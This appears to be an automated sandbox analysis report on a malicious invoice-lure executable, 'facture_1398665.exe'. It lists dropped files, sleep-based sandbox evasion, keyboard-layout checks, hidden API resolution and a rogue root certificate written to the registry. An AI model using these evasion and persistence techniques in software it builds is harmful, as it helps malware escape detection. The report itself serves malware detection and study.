Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmpJump to dropped file
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeAPI coverage: 2.6 %
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeAPI coverage: 2.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 1860Thread sleep count: 88 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044Thread sleep count: 130 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044Thread sleep time: -7800000s >= -60000sJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2084Thread sleep time: -180000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2060Thread sleep time: -1800000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2344Thread sleep time: -1260000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2100Thread sleep time: -922337203685477s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 1444Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 1436Thread sleep count: 203 > 30
Source: C:\Windows\explorer.exe TID: 1436Thread sleep time: -12180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1436Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_6EE01230 GetKeyboardLayout followed by cmp: cmp al, 0ch and CTI: je 6EE0128Fh6_2_6EE01230
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_00405BEC
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_1_00405BEC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_2_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_2_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004AD294 FindFirstFileW,GetLastError,3_2_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,3_2_004FDF38
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C0BC0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004BF43C FindFirstFileW,FindNextFileW,FindClose,3_2_004BF43C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C107C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_1_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_1_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004AD294 FindFirstFileW,GetLastError,3_1_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF154 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF154
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF033 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF033
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF27E
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FEF1D
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E109748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,4_2_6E109748
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E1098CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,4_2_6E1098CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697C98CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,5_2_697C98CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BEF1D
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697C9748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,5_2_697C9748
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BF27E
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00383836 SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcat,SHFileOperation,FindNextFileA,SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrcat,CreateFileA,GetFileSize,ReadFile,lstrcat,lstrcat,StrStrA,lstrlen,WriteFile,lstrlen,WriteFile,??3@YAXPAX@Z,CloseHandle,FindNextFileA,6_2_00383836
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0038364C SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcat,SHFileOperation,DeleteFileA,FindNextFileA,6_2_0038364C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00382F10 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,6_2_00382F10
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040ED40 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,2_2_0040ED40
Program exit pointsShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeAPI call chain: ExitProcess graph end nodegraph_2-7768
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information queried: ProcessInformationJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,3_2_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_0046335C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,3_2_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004629EC IsIconic,GetCapture,3_2_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00470A2C IsIconic,3_2_00470A2C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00481238 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_00481238
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00463DC8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,ScreenToClient,ScreenToClient,3_2_00463DC8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0042DBCC MonitorFromWindow,MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,3_2_0042DBCC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004E6860 IsIconic,GetWindowLongW,ShowWindow,ShowWindow,3_2_004E6860
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,3_1_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_1_0046335C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,3_1_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004629EC IsIconic,GetCapture,3_1_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00470A2C IsIconic,3_1_00470A2C
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0037F213 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetPr6_2_0037F213
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Stores large binary data to the registryShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\facture_1398665.exeProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeProcess information set: NOOPENFILEERRORBOX